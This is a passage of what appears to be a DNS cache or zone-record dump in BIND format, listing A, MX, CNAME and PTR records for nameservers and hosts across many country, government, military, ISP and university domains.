PAPP.UNDP.org. +PAPPSRV IN A 192.115.229.1 +$ORIGIN xaos.org. +amethyst IN A 204.145.159.12 + IN MX 0 mail.xaos.org. + IN MX 5 gw.xaos.org. +sure IN A 209.67.235.38 +taiyoo IN A 204.145.159.13 + IN MX 0 mail.xaos.org. + IN MX 5 gw.xaos.org. +gw IN A 24.93.15.22 +reimei IN A 204.145.159.17 + IN MX 0 mail.xaos.org. + IN MX 5 gw.xaos.org. +gwi IN A 204.145.159.2 + IN HINFO "Firewall" "Gateway" + IN MX 0 mail.xaos.org. + IN MX 5 gw.xaos.org. +keith IN A 209.67.235.37 +axis IN A 204.145.159.20 +mail IN CNAME furii.xaos.org. +all IN A 24.95.203.33 + IN MX 0 mail.xaos.org. + IN MX 5 gw.xaos.org. +www IN CNAME gw.xaos.org. +kadou IN A 204.145.159.14 + IN MX 0 mail.xaos.org. + IN MX 5 gw.xaos.org. +furii IN A 204.145.159.11 + IN MX 0 mail.xaos.org. + IN MX 5 gw.xaos.org. +ftp IN CNAME gw.xaos.org. +gwe IN CNAME gw.xaos.org. +$ORIGIN PUNCHDOWN.org. +NS IN A 140.174.131.100 +$ORIGIN mmuuf.org. +www IN MX 10 gro.dd.org. + IN A 209.198.103.205 +$ORIGIN OPEN-RSC.org. +ASLAN IN A 199.5.157.128 +UNICORN IN A 207.126.103.16 +$ORIGIN COGNOSCENTI.org. +SYNAESTHESIA IN A 207.208.112.4 +ANAESTHESIA IN A 207.208.112.3 +$ORIGIN DC.IGC.org. +NS IN A 199.75.208.10 +$ORIGIN mitre.org. +DNSSRV1X IN A 199.94.97.51 +mbunix IN A 199.94.97.52 +DNSSRV3X IN A 198.76.173.100 +smtpproxy1 IN A 129.83.20.90 +linus IN A 129.83.10.1 + IN MX 1 linus.mitre.org. + IN MX 5 smtpproxy1.mitre.org. + IN MX 10 smtpproxy2.mitre.org. +smtpproxy2 IN A 128.29.154.90 +mwunix IN A 198.76.173.52 +$ORIGIN reptiles.org. +mail IN A 198.96.117.157 +NS2 IN A 192.75.253.138 +NS IN A 198.96.117.136 +$ORIGIN ISPC.org. +NS2 IN A 209.124.64.11 +NS3 IN A 207.230.32.23 +NS1 IN A 207.106.7.7 +$ORIGIN IGC.APC.org. +NS1 IN A 192.82.108.38 +$ORIGIN iscvt.org. +isc-01 IN A 207.136.209.131 +$ORIGIN FLIRBLE.org. +NS0 IN A 195.40.6.20 +$ORIGIN SANS.org. +SERVER1 IN A 167.216.133.33 +$ORIGIN LTWCC.org. +NS2 IN A 12.33.66.62 +NS1 IN A 12.33.66.61 +$ORIGIN CMHNET.org. +elektro IN A 192.188.133.3 +$ORIGIN SNPT.KM. +BOW IN A 195.101.19.253 +$ORIGIN ONPT.NET.MA. +MASSIRA IN A 206.103.26.1 +$ORIGIN IAM.NET.MA. +DNS2 IN A 212.217.0.12 +DNS3 IN A 212.217.1.1 +DNS1 IN A 212.217.0.1 +$ORIGIN KREONET.RE.KR. +NS IN A 134.75.30.1 +$ORIGIN KREN.NE.KR. +NS IN A 147.47.1.1 +$ORIGIN NIC.LK. +NS IN A 192.248.1.65 +$ORIGIN NIC.MC. +NS IN A 195.78.6.131 +$ORIGIN 110.16.12.IN-ADDR.ARPA. +35 IN CNAME 35.32/27.110.16.12.in-addr.arpa. +$ORIGIN 32/27.110.16.12.IN-ADDR.ARPA. +35 IN PTR mail.nova-data.com. +$ORIGIN 0.0.127.IN-ADDR.ARPA. +1 IN PTR localhost. +$ORIGIN 184.152.204.IN-ADDR.ARPA. +87 IN PTR isrv3-i.isc.org. +$ORIGIN 187.152.204.IN-ADDR.ARPA. +59 IN PTR shell.nominum.com. +$ORIGIN 131.127.204.IN-ADDR.ARPA. +47 IN PTR mtiwmhc22.worldnet.att.net. +$ORIGIN 198.245.204.IN-ADDR.ARPA. +90 IN PTR maus.spack.org. +$ORIGIN 159.145.204.IN-ADDR.ARPA. +12 IN PTR amethyst.xaos.org. +13 IN PTR taiyoo.xaos.org. +14 IN PTR kadou.xaos.org. +17 IN PTR reimei.xaos.org. +20 IN PTR axis.xaos.org. +2 IN PTR gwi.xaos.org. +11 IN PTR furii.xaos.org. +$ORIGIN 241.5.198.IN-ADDR.ARPA. +38 IN PTR cmr0.ash.ops.us.uu.net. +39 IN PTR cmr1.ash.ops.us.uu.net. +$ORIGIN 241.103.199.IN-ADDR.ARPA. +218 IN PTR abyssinian.sleepycat.com. +$ORIGIN 153.66.206.IN-ADDR.ARPA. +12 IN PTR d.dd.org. +102 IN PTR gro.dd.org. +128 IN PTR www.vmba.org. +1 IN PTR workgroup.dd.org. +2 IN PTR doubt.dd.org. +136 IN PTR www.mmuuf.org. +4 IN PTR nila.dd.org. +10 IN PTR go.dd.org. +$ORIGIN 84.198.209.IN-ADDR.ARPA. +242 IN PTR dlawren-gw.burl.sover.net. +$ORIGIN 87.198.209.IN-ADDR.ARPA. +52 IN PTR mqueue0.sover.net. +$ORIGIN 103.198.209.IN-ADDR.ARPA. +198 IN CNAME 198.192.103.198.209.in-addr.arpa. +205 IN CNAME 205.192.103.198.209.in-addr.arpa. +199 IN CNAME 199.192.103.198.209.in-addr.arpa. +206 IN CNAME 206.192.103.198.209.in-addr.arpa. +193 IN CNAME 193.192.103.198.209.in-addr.arpa. +200 IN CNAME 200.192.103.198.209.in-addr.arpa. +201 IN CNAME 201.192.103.198.209.in-addr.arpa. +$ORIGIN 192.103.198.209.IN-ADDR.ARPA. +202 IN PTR fraud.dd.org. +195 IN PTR dhcp2.dd.org. +203 IN PTR fraud.dd.org. +196 IN PTR dhcp3.dd.org. +204 IN PTR ppp.dd.org. +197 IN PTR dhcp4.dd.org. +205 IN PTR www.mmuuf.org. +198 IN PTR go.dd.org. +206 IN PTR www.vmba.org. +199 IN PTR d.dd.org. +207 IN PTR broadcast.dd.org. +200 IN PTR gro.dd.org. +193 IN PTR doubt.dd.org. +201 IN PTR workgroup.dd.org. +194 IN PTR dhcp1.dd.org. +$ORIGIN 133.188.192.IN-ADDR.ARPA. +3 IN PTR elektro.com. +$ORIGIN 206.203.192.IN-ADDR.ARPA. +9 IN PTR ice.WonderWorks.COM. +$ORIGIN 2.39.137.IN-ADDR.ARPA. +3 IN PTR New-York4.NY.ALTER.NET. +$ORIGIN 126.39.137.IN-ADDR.ARPA. +10 IN PTR Fddi0-0.New-York4.NY.ALTER.NET. +$ORIGIN IRD.MG. +ANTANA IN A 194.214.107.1 +$ORIGIN NIC.MG. +NS IN A 194.214.107.253 +$ORIGIN KW. +DNS2 IN A 161.252.48.150 +DNS1 IN A 161.252.48.140 +$ORIGIN MOC.KW. +NCC IN A 196.1.69.98 +$ORIGIN NET.NA. +GRUMPY IN A 196.20.23.1 +$ORIGIN RELCOM.KZ. +NS IN A 212.110.240.65 +$ORIGIN MARNET.MK. +KITKA IN A 194.149.131.2 +$ORIGIN SC-UNI.KTU.LT. +NEMUNAS IN A 193.219.32.13 +$ORIGIN SOTELMA.ML. +ASKIA IN A 208.144.230.3 +$ORIGIN DNS.LU. +NS2 IN A 158.64.229.3 +NS5 IN A 194.246.96.193 +NS1 IN A 158.64.229.2 +$ORIGIN INTNET.NE. +BOW IN A 194.51.164.253 +$ORIGIN MN. +MAGIC IN A 202.131.0.10 +$ORIGIN NF. +NS2 IN A 203.12.249.101 +NS1 IN A 203.12.249.100 +$ORIGIN LATNET.LV. +NS2 IN A 159.148.108.1 +NS IN A 159.148.60.2 +$ORIGIN UMAC.MO. +UMACSN2 IN A 161.64.3.2 +NS2 IN A 161.64.7.2 +UMACSN1 IN A 161.64.3.1 +NS1 IN A 161.64.7.1 +$ORIGIN NI. +NS IN A 165.98.1.2 + IN A 200.30.36.8 +$ORIGIN TMX.COM.NI. +NS IN A 205.218.253.2 +$ORIGIN UNIV-NKC.MR. +DNS2 IN A 193.251.145.154 +DNS1 IN A 193.251.145.155 +$ORIGIN SVIANED.nl. +NS IN A 143.177.1.3 +$ORIGIN secondary.nl. +ns2 IN A 194.229.138.6 +$ORIGIN DOMAIN-REGISTRY.nl. +NS2 IN A 193.176.144.130 +NS IN A 193.176.144.2 +$ORIGIN MT. +NS IN A 193.188.47.252 +$ORIGIN DHIRAAGU.MV. +NS IN A 202.1.192.196 +$ORIGIN NO. +NAC IN A 129.240.2.40 +ALCANET IN MX 15 tyholt.uninett.no. + IN MX 20 nac.no. + IN A 158.39.5.5 +$ORIGIN UIO.NO. +IFI IN A 129.240.64.2 +$ORIGIN SOL.NO. +NS1 IN A 195.225.2.10 +$ORIGIN uit.NO. +benoni IN A 129.242.4.254 +$ORIGIN ALCANET.NO. +NS IN A 193.213.238.10 +$ORIGIN UNINETT.NO. +aun IN A 129.241.1.99 +tyholt IN A 158.38.60.10 +NN IN A 158.38.0.181 +$ORIGIN alcatel.NO. +ns2 IN A 193.213.238.2 +$ORIGIN UNINET.NET.MX. +MEX1-M-213 IN A 200.33.146.213 +$ORIGIN AVANTEL.NET.MX. +DNS1 IN A 200.33.213.66 +$ORIGIN UNAM.MX. +NS IN A 132.248.253.1 +$ORIGIN NIC.MX. +NS IN A 200.23.1.1 +$ORIGIN MOS.COM.NP. +SHIKHAR IN A 202.52.255.5 +$ORIGIN MY. +MIMOS IN A 192.228.128.18 +JARING IN A 192.228.128.20 +$ORIGIN JARING.MY. +GATEN IN A 161.142.227.17 +GATE1 IN A 161.142.2.17 +$ORIGIN PA. +NS IN A 168.77.8.2 +$ORIGIN USMA.AC.PA. +VASCO IN A 208.141.92.2 +$ORIGIN UEM.MZ. +ZEBRA IN A 196.3.96.67 +OCEANO IN A 196.3.96.69 +DZOWO IN A 196.3.96.66 +$ORIGIN CENPAC.NET.NR. +NRWEB IN A 203.98.224.66 +$ORIGIN NIC.NU. +NS IN A 128.11.47.50 +$ORIGIN DE.NIC.NU. +NS0 IN A 216.200.116.40 +$ORIGIN TELIA.NIC.NU. +NS0 IN A 212.181.91.4 +$ORIGIN NS.NIC.NU. +NZ IN A 203.97.132.66 +$ORIGIN OMANTEL.NET.OM. +OM4 IN A 206.49.101.5 +OM10 IN A 206.49.101.6 +$ORIGIN RCP.NET.PE. +ICHU IN A 161.132.5.14 +$ORIGIN MANA.PF. +NS2 IN A 202.3.225.20 +NS1 IN A 202.3.225.10 +$ORIGIN QATAR.NET.QA. +NS2 IN A 212.77.192.13 +NS3 IN A 212.77.192.15 +NS1 IN A 212.77.192.10 +$ORIGIN CLEAR.NET.NZ. +NS2 IN A 203.97.37.14 +NS1 IN A 203.97.33.14 +$ORIGIN DNS.NET.NZ. +NS1 IN A 202.46.161.3 +$ORIGIN IHUG.NET.NZ. +NS2 IN A 203.29.160.2 +$ORIGIN XTRA.CO.NZ. +GORGON IN A 202.27.158.34 +$ORIGIN WAIKATO.AC.NZ. +NS99 IN A 130.217.76.27 +$ORIGIN VUW.AC.NZ. +RATA IN A 130.195.2.11 +$ORIGIN MCS.VUW.AC.NZ. +DOWNSTAGE IN A 130.195.6.10 +CIRCA IN A 130.195.5.12 +$ORIGIN PL. +from IN A 212.160.132.114 +$ORIGIN NASK.ORG.PL. +BILBO IN A 148.81.16.51 + IN A 195.187.245.51 +$ORIGIN pbks.PL. +alf IN A 195.205.33.200 +$ORIGIN CYFRONET.KRAKOW.PL. +NMS IN A 149.156.1.3 +$ORIGIN MAN.LODZ.PL. +DNS2 IN A 212.51.192.5 +$ORIGIN ispid.com.PL. +trurl IN A 195.150.99.3 +$ORIGIN itnet.com.PL. +emerald IN A 195.116.64.3 +$ORIGIN ELEKTRON.PL. +AMBER IN A 195.117.6.10 +$ORIGIN macrosoft.WAW.PL. +front IN A 194.196.86.66 +$ORIGIN NASK.WAW.PL. +ARWENA IN A 193.59.201.28 +$ORIGIN webtech.elk.PL. +tornado IN A 212.244.162.100 +$ORIGIN IKP.PL. +NS3 IN A 157.25.5.30 +$ORIGIN TPSA.PL. +DNS2 IN A 194.204.152.34 +$ORIGIN uwm.EDU.PL. +matrix IN A 213.184.3.136 +$ORIGIN FUW.EDU.PL. +DNS IN A 193.0.80.11 +$ORIGIN UPRR.PR. +PASCAL IN A 134.202.1.120 +DESCARTES IN A 134.202.1.125 +$ORIGIN NCC.UP.PT. +CIUP1 IN A 193.136.51.52 +$ORIGIN FCCN.PT. +DNS IN A 193.136.192.10 +$ORIGIN DNS.PT. +NS IN A 193.136.0.1 +$ORIGIN TELEPAC.PT. +NS1 IN A 194.65.3.20 +VIVALDI IN A 194.65.3.21 +$ORIGIN CNC.UNA.PY. +SCE IN A 200.10.228.133 +NS IN A 200.10.228.132 +$ORIGIN ISU.NET.SA. +NS1 IN A 212.26.18.3 +$ORIGIN KACST.EDU.SA. +NS IN A 212.26.44.3 +$ORIGIN COM.SB. +PIJIN IN A 202.139.42.10 +$ORIGIN SOLOMON.COM.SB. +OLKETA IN A 202.139.42.4 +$ORIGIN cafax.SE. +ns IN A 192.71.228.17 +$ORIGIN LTH.SE. +NIC IN A 130.235.20.3 +$ORIGIN SUNET.SE. +SUNIC IN A 192.36.125.2 +$ORIGIN PACIFIC.NET.SG. +NS1 IN A 192.169.33.3 +$ORIGIN NIC.NET.SG. +DS IN A 202.42.194.205 +$ORIGIN SINGNET.COM.SG. +DNSSEC2 IN A 195.13.10.226 +DNSSEC3 IN A 165.21.100.11 +DNSSEC1 IN A 165.21.83.11 +$ORIGIN RNC.RO. +NS-A IN A 192.162.16.31 +NS IN A 192.162.16.21 +$ORIGIN NIC.SH. +NS IN A 194.205.62.60 +$ORIGIN ARNES.SI. +KANIN IN A 193.2.1.66 +SREBRNJAK IN A 193.2.1.91 +$ORIGIN INTERNET.SK. +NS IN A 192.108.130.91 +$ORIGIN EUNET.SK. +NS IN A 192.108.130.33 +$ORIGIN NETLAB.SK. +NS IN A 195.168.1.4 +$ORIGIN SIERRATEL.SL. +NS IN A 194.133.124.5 +$ORIGIN INTNET.TD. +BOW IN A 193.251.147.253 +$ORIGIN RU. +ok IN A 195.2.83.162 + IN MX 50 mail.ok.ru. + IN MX 100 relay1.aha.ru. + IN MX 300 relay3.aha.ru. +$ORIGIN aha.RU. +ns1 IN A 195.2.80.142 +$ORIGIN ok.RU. +mail IN A 195.2.83.162 +ns IN A 195.2.64.36 +$ORIGIN INTELCOM.SM. +DNS IN A 194.183.64.11 +$ORIGIN OMNIWAY.SM. +DNS IN A 194.183.64.10 +$ORIGIN UCAD.SN. +NS IN A 196.1.95.1 +$ORIGIN NIC.TJ. +NS2 IN A 209.77.224.1 +NS1 IN A 209.77.250.1 +$ORIGIN SPB.SU. +NS IN A 193.124.83.69 +$ORIGIN RICC.ALMA-ATA.SU. +NS IN A 194.87.112.4 +$ORIGIN DEMOS.SU. +NS IN A 194.87.0.8 + IN A 194.87.0.9 +$ORIGIN RED.SV. +CIR IN A 168.243.254.1 +$ORIGIN GOB.SV. +CONACYT IN A 168.243.64.2 +ANTEL IN A 168.243.65.1 +$ORIGIN ATI.TN. +NS IN A 193.95.66.10 +$ORIGIN TO. +TONIC IN A 206.184.59.10 +COLO IN A 206.86.247.253 +$ORIGIN TDC.TO. +NS1 IN A 206.86.247.250 +$ORIGIN SY. +EARTH IN A 195.22.198.6 +$ORIGIN VATICAN.VA. +MICHAEL IN A 212.77.0.2 +$ORIGIN METU.EDU.TR. +NS2 IN A 144.122.199.93 +NS1 IN A 144.122.199.90 +$ORIGIN NIC.UK. +NS1 IN A 195.66.240.130 +$ORIGIN AXION.BT.CO.UK. +DNS0 IN A 132.146.5.1 +$ORIGIN ADVSYS.CO.UK. +BARNEY IN A 194.72.124.2 +$ORIGIN WR.UMIST.AC.UK. +AARDVARK IN A 130.88.146.3 + IN A 128.16.5.31 + IN MX 10 bells.cs.ucl.ac.uk. + IN MX 11 haig.cs.ucl.ac.uk. +$ORIGIN CS.UCL.AC.UK. +haig IN A 128.16.6.8 +bells IN A 128.16.5.31 +NS1 IN A 128.16.5.32 +$ORIGIN surrey.AC.UK. +info-server IN A 131.227.102.6 +eim IN MX 6 phoebe.eim.surrey.ac.uk. + IN MX 6 prue.eim.surrey.ac.uk. +$ORIGIN eim.surrey.AC.UK. +prue IN A 131.227.76.5 +phoebe IN A 131.227.74.4 +$ORIGIN MHS-RELAY.AC.UK. +SUN IN A 128.86.8.25 +$ORIGIN NIC.TT. +DNS IN A 24.3.198.194 +$ORIGIN REACCIUN.VE. +DNS2 IN A 150.188.4.212 +DNS IN A 150.188.4.210 +$ORIGIN ULA.VE. +AZMODAN IN A 150.185.130.16 +$ORIGIN UTZ. +NS2 IN A 160.124.112.10 +NS3 IN A 160.124.147.1 +NS1 IN A 160.124.48.4 +$ORIGIN NIC.TV. +NS4 IN A 207.151.24.23 +NS2 IN A 208.184.1.167 +NS6 IN A 64.56.165.153 +NS7 IN A 64.69.172.153 +NS1 IN A 209.143.242.138 +$ORIGIN EDU.TW. +MOEVAX IN A 140.111.1.2 +$ORIGIN vt.us. +state IN MX 10 mx1.state.vt.us. + IN MX 10 mx2.state.vt.us. +$ORIGIN k12.vt.us. +ns2 IN A 170.222.64.130 +morristown IN MX 0 mail.k12.vt.us. +ns1 IN A 170.222.64.130 +jericho IN MX 0 mail.k12.vt.us. +founders IN MX 0 mail.k12.vt.us. +$ORIGIN state.vt.us. +srs IN A 159.105.101.150 + IN MX 0 srs.srs.state.vt.us. + IN MX 10 mx1.state.vt.us. + IN MX 10 mx2.state.vt.us. +defgen IN MX 0 mail.state.vt.us. + IN MX 10 mx1.state.vt.us. + IN MX 10 mx2.state.vt.us. + IN MX 5 vtagr02.agr.state.vt.us. + IN MX 15 mx1.state.vt.us. + IN MX 20 mx2.state.vt.us. +mail IN A 170.222.64.134 +ns1 IN A 159.105.23.130 +ns2 IN A 170.222.64.130 +$ORIGIN srs.state.vt.us. +srs IN A 159.105.101.150 +$ORIGIN agr.state.vt.us. +vtagr04 IN A 159.105.50.4 +vtagr02 IN A 159.105.50.2 +$ORIGIN anr.state.vt.us. +dec IN MX 10 mx1.state.vt.us. + IN MX 10 mx2.state.vt.us. + IN MX 0 dec.anr.state.vt.us. + IN A 159.105.46.4 +$ORIGIN pha.pa.us. +candle IN A 162.33.245.46 +$ORIGIN CNRI.reston.va.us. +NS IN A 132.151.1.1 +$ORIGIN boston.MA.us. +foxharp IN MX 10 bparker.connactivity.com. +$ORIGIN ns.foxharp.boston.MA.us. +a IN A 24.147.209.205 +$ORIGIN STARFIRE.DOUGLAS.MA.us. +NS2 IN A 216.129.136.9 +DNS IN A 206.225.44.40 +NS1 IN A 216.129.136.9 +$ORIGIN NIC.us. +USDNS IN A 198.41.3.87 +$ORIGIN sf.ca.us. +asylum IN A 192.48.232.17 +$ORIGIN palo-alto.ca.us. +mejac IN A 192.147.236.1 +$ORIGIN VN. +DNS1 IN A 203.162.3.235 +$ORIGIN EDU.UY. +SECIU IN A 164.73.128.5 +$ORIGIN UZ. +NS IN A 213.68.88.11 +$ORIGIN NOC.UZ. +NS IN A 194.67.52.42 +$ORIGIN VANUATU.COM.VU. +SANTO IN A 202.139.40.7 +FUTUNA IN A 202.139.40.3 +EFATE IN A 202.139.40.5 +$ORIGIN nic.mnet. +ns2 IN A 208.109.83.110 +ns1 IN A 216.61.39.172 +$ORIGIN DNS.WS. +NS4 IN A 216.52.234.102 +NS2 IN A 216.35.187.250 +NS1 IN A 202.4.48.217 +NS5 IN A 216.35.188.8 +NS3 IN A 216.52.234.99 +$ORIGIN UCT.AC.ZA. +UCTHPX IN A 137.158.128.1 +$ORIGIN FRD.AC.ZA. +APIES IN A 137.214.80.1 +$ORIGIN EE.UND.AC.ZA. +DAISY IN A 146.230.192.18 +$ORIGIN RU.AC.ZA. +HIPPO IN A 146.231.128.1 +$ORIGIN UNZA.ZM. +PUKU IN A 196.7.240.1 +$ORIGIN NIC.YU. +NS1 IN A 147.91.8.6 +$ORIGIN TELEKOM.YU. +ODISEJ IN A 195.178.32.2 +$ORIGIN gtld-servers.ORSC. +b IN A 216.13.126.116 +$ORIGIN ROOT-SERVERS.ORSC. +B IN A 216.13.126.116 +C IN A 65.196.80.102 +A IN A 199.166.24.1 +$ORIGIN ZPTC.CO.ZW. +TELCOM IN A 194.133.122.47 +$ORIGIN NIPR.MIL. +PAC2 IN A 199.252.155.234 +EUR2 IN A 199.252.143.234 +CON2 IN A 199.252.173.234 +PAC1 IN A 199.252.180.234 +EUR1 IN A 199.252.154.234 +CON1 IN A 199.252.175.234 +$ORIGIN ARL.MIL. +ADMII IN A 128.63.31.4 + IN A 128.63.5.4 +$ORIGIN GOV. +nps IN MX 5 ccmail.itd.nps.gov. + IN MX 10 ccmail2.itd.nps.gov. +$ORIGIN STAT-USA.GOV. +SUNNY IN A 192.239.70.8 +$ORIGIN NASA.GOV. +jpl IN A 137.78.160.180 +NASANS4 IN A 198.116.144.33 +NASANS3 IN A 198.116.144.49 +NASANS1 IN A 192.77.84.32 +$ORIGIN NSI.NASA.GOV. +MX IN A 128.102.18.31 +$ORIGIN CDC.GOV. +NS2 IN A 198.246.96.92 +NS1 IN A 198.246.96.61 +$ORIGIN NIST.GOV. +NS1 IN A 129.6.13.2 +$ORIGIN cr.USGS.GOV. +ISDSUN IN A 136.177.16.3 +ns IN A 136.177.16.3 +rgfsparc IN A 136.177.164.192 +$ORIGIN ER.USGS.GOV. +NS IN A 130.11.48.2 +$ORIGIN WR.USGS.GOV. +ISDMNL IN A 130.118.4.2 +$ORIGIN DEN.nps.GOV. +DENS20 IN A 165.83.24.20 +$ORIGIN ITD.nps.GOV. +BIGBIRD IN A 165.83.208.5 +$ORIGIN AKSO.nps.GOV. +INPAKSODNS IN A 165.83.49.9 +$ORIGIN WRO.nps.GOV. +VANILLA IN A 165.83.71.3 +$ORIGIN NCC.nps.GOV. +OWL IN A 165.83.34.60 +$ORIGIN net. +FIREHOUSE IN A 63.160.175.19 +gbch IN MX 0 maxim.gbch.net. +VERMONTEL IN A 63.167.45.2 + IN MX 0 pop.vermontel.net. +reedmedia IN A 63.145.197.178 +goldstats IN A 66.33.12.17 +zama IN A 203.142.132.46 +helicon IN A 63.93.137.2 +wetlogic IN MX 10 athome.wetlogic.net. +188 IN A 202.96.125.100 + IN A 202.96.125.101 + IN MX 10 mx2.188.net. + IN MX 20 smtp.188.net. + IN MX 10 mx1.188.net. +valley IN MX 0 lebanon.valley.net. +primary IN A 216.87.34.253 +SOVER IN A 209.198.87.53 + IN A 209.198.87.34 + IN MX 10 mail.sover.net. + IN MX 20 mqueue.sover.net. +UU IN MX 10 external-mail-router.UU.NET. +connriver IN A 63.93.137.13 + IN MX 10 ns.hcr.net. + IN MX 1 mailer.connriver.net. +SHOREHAM IN A 199.170.121.2 +$ORIGIN cinenet.net. +NS1 IN A 198.147.76.65 +$ORIGIN TOGETHER.net. +NS2 IN A 204.97.120.31 +NS1 IN A 204.97.120.30 +$ORIGIN IPHIL.net. +MAKISIG IN A 203.176.28.135 +$ORIGIN PLANET-THREE.net. +NS2 IN A 212.49.219.190 +$ORIGIN FIREHOUSE.net. +DNS2 IN A 63.160.175.18 +DNS1 IN A 63.160.175.19 +$ORIGIN space.net. +ns IN A 195.30.0.1 +$ORIGIN DNS.space.net. +NS4 IN A 195.222.210.93 +NS3 IN A 193.149.44.49 +$ORIGIN ALASKA.net. +NS4-AUTH IN A 209.112.130.4 +NS1-AUTH IN A 209.112.160.4 +$ORIGIN FWIDCSERVICES.net. +DEN-NS2 IN A 216.7.160.32 +IRV-NS1 IN A 216.23.160.51 +DEN-NS1 IN A 216.7.160.31 +NS1 IN A 64.78.224.58 +$ORIGIN BIJT.net. +PAN IN A 213.196.2.97 +$ORIGIN SEABONE.net. +DNS IN A 195.22.205.163 +$ORIGIN SPIN.OMNES.net. +NS IN A 192.23.90.196 +$ORIGIN VERIO.net. +NS2 IN A 129.250.31.190 +NS0 IN A 129.250.15.61 +NS1 IN A 204.91.99.140 +$ORIGIN NS.VERIO.net. +B IN A 129.250.35.32 +T IN A 192.67.14.16 +$ORIGIN GNOSH.net. +GRIN IN A 216.15.87.207 +$ORIGIN NEASE.net. +NS2 IN A 202.103.134.4 +$ORIGIN CRSNIC.net. +NS1 IN A 198.41.3.39 +$ORIGIN VERISIGN.net. +MODOR IN A 205.139.94.55 +CITADEL IN A 205.139.94.15 +PAGOSA IN A 205.139.94.16 +KAOS IN A 208.202.137.126 +$ORIGIN terra.net. +ns2 IN A 199.103.128.2 +ns1 IN A 199.103.128.1 +$ORIGIN ADMONITOR.net. +NS-2 IN A 216.35.185.40 +ads IN A 216.35.185.145 +SC-NS1 IN A 64.70.20.85 +$ORIGIN NORDU.net. +SERVER IN A 193.10.252.19 +$ORIGIN TELEGLOBE.net. +CASTOR IN A 199.202.55.2 +$ORIGIN sodak.net. +NS2 IN A 63.65.239.225 +RINGNECK IN A 63.65.238.65 +$ORIGIN gbch.net. +MAXIM IN A 203.9.155.249 +$ORIGIN VERMONTEL.net. +pop IN CNAME loomis.vermontel.net. +NS2 IN A 204.164.106.8 +loomis IN A 204.164.106.19 +NS1 IN A 204.164.106.2 +$ORIGIN farm.net. +ns IN A 216.112.179.160 +$ORIGIN NAP.net. +NS2 IN A 206.54.224.1 +$ORIGIN AH.net. +NS4 IN A 203.21.205.20 +NS2 IN A 203.21.205.1 +$ORIGIN NS.GDNS.net. +LHR IN A 212.250.25.101 +DCA IN A 209.207.221.1 +$ORIGIN CONCENTRIC.net. +NAMESERVER1 IN A 207.155.183.73 +NAMESERVER3 IN A 206.173.119.72 +NAMESERVER IN A 207.155.183.72 +NIC2 IN A 207.88.60.5 +NAMESERVER2 IN A 207.155.184.72 +$ORIGIN att.net. +worldnet IN A 199.70.151.234 +$ORIGIN worldnet.att.net. +ns3 IN A 204.127.160.1 +ns4 IN A 204.127.160.2 +mtiwmhc22 IN A 204.127.131.47 +ns1 IN A 204.127.129.1 +ns IN A 204.127.160.2 + IN A 12.102.240.1 + IN A 12.102.240.2 + IN A 12.102.244.1 + IN A 12.102.244.2 + IN A 204.127.129.1 + IN A 204.127.129.2 + IN A 204.127.160.1 +ns2 IN A 204.127.129.2 +$ORIGIN OR.BR.NP.ELS-GMS.att.net. +ORCU IN A 199.191.129.139 +$ORIGIN WY.BR.NP.ELS-GMS.att.net. +WYCU IN A 199.191.128.43 +$ORIGIN OH.MT.NP.ELS-GMS.att.net. +OHCU IN A 199.191.144.75 +$ORIGIN MA.MT.NP.ELS-GMS.att.net. +MACU IN A 199.191.145.136 +$ORIGIN MT.NS.ELS-GMS.att.net. +CMTU IN A 12.127.16.69 +DMTU IN A 12.127.16.70 +$ORIGIN BR.NS.ELS-GMS.att.net. +CBRU IN A 199.191.128.105 +DBRU IN A 199.191.128.106 +$ORIGIN LEB.net. +NS IN A 206.127.55.2 +$ORIGIN SEG.net. +NS2 IN A 206.34.181.16 +NS1 IN A 206.34.181.15 +$ORIGIN romkey.SEG.net. +ip1 IN A 207.121.69.234 +$ORIGIN ync.net. +NS4 IN A 206.185.20.9 +NS2 IN A 216.34.185.21 +NS5 IN A 206.185.20.10 +NS3 IN A 206.185.20.8 +ns1 IN A 216.34.185.20 +$ORIGIN GLOBECOMM.net. +NS2 IN A 165.251.1.3 +NS1 IN A 165.251.1.2 +$ORIGIN PREP.net. +DNS-EAST IN A 129.250.252.10 +$ORIGIN EARTHLINK.net. +NS4 IN A 209.179.179.19 +DNS2 IN A 207.217.77.12 +DNS3 IN A 207.217.120.13 +DNS4 IN A 209.179.179.18 +NS1 IN A 207.217.126.41 +NS2 IN A 207.217.77.42 +$ORIGIN SPRINTLINK.net. +NS3-AUTH IN A 144.228.255.10 +NS2-AUTH IN A 144.228.254.10 +NS1-AUTH IN A 206.228.179.10 +$ORIGIN OP.net. +NS1 IN A 209.152.193.4 +$ORIGIN CERNET.net. +NS IN A 202.112.0.44 +$ORIGIN zenon.net. +dns IN A 195.2.83.107 +$ORIGIN INFI.net. +NS3 IN A 205.219.239.5 +NS4 IN A 216.33.106.19 +NS001 IN A 208.131.160.201 +NS1 IN A 198.22.1.107 +NS2 IN A 198.22.1.108 +$ORIGIN vh8.INFI.net. +vh80040 IN A 209.97.59.245 +vh80167 IN A 209.97.57.116 +$ORIGIN vh4.INFI.net. +vh40099 IN A 209.97.59.121 +$ORIGIN SCRUZ.net. +NS2 IN A 165.227.2.10 +NS IN A 165.227.1.1 +$ORIGIN HINET.net. +netnews IN A 168.95.195.16 + IN MX 0 netnews.hinet.net. +HNTP1 IN A 168.95.192.1 +HNTP3 IN A 168.95.192.2 +DNS IN A 168.95.1.1 +$ORIGIN reedmedia.net. +ns2 IN A 209.241.86.6 +NS1 IN A 63.145.197.178 +$ORIGIN schnism.net. +ns IN A 195.88.150.3 +$ORIGIN unlisys.net. +mail IN A 195.21.255.252 +$ORIGIN AIC.net. +NS IN A 195.250.64.65 +$ORIGIN PIPEX-SZ.net. +NS IN A 196.15.232.19 +$ORIGIN DOMAINNT.net. +DENEB IN A 207.211.220.90 +RIGEL IN A 212.0.205.5 +VEGA IN A 209.26.120.5 +POLARIS IN A 209.26.120.2 +ANTARES IN A 209.26.120.3 +$ORIGIN GUERNSEY.net. +DNS2 IN A 195.226.128.3 +$ORIGIN usa.net. +CNDVG001 IN A 165.212.12.1 +$ORIGIN OPS.usa.net. +dns03 IN A 204.68.24.136 +DNS01 IN A 204.68.24.137 +$ORIGIN INR.net. +NS2 IN A 198.77.208.3 +NS1 IN A 198.77.208.2 +$ORIGIN CP.MSFT.net. +dns6 IN A 207.46.138.20 +DNS4 IN A 207.46.138.11 +dns7 IN A 207.46.138.21 +dns IN A 207.46.138.10 +DNS5 IN A 207.46.138.12 +$ORIGIN UK.MSFT.net. +DNS4 IN A 213.199.144.152 +DNS3 IN A 213.199.144.151 +$ORIGIN TK.MSFT.net. +DNS2 IN A 207.46.232.38 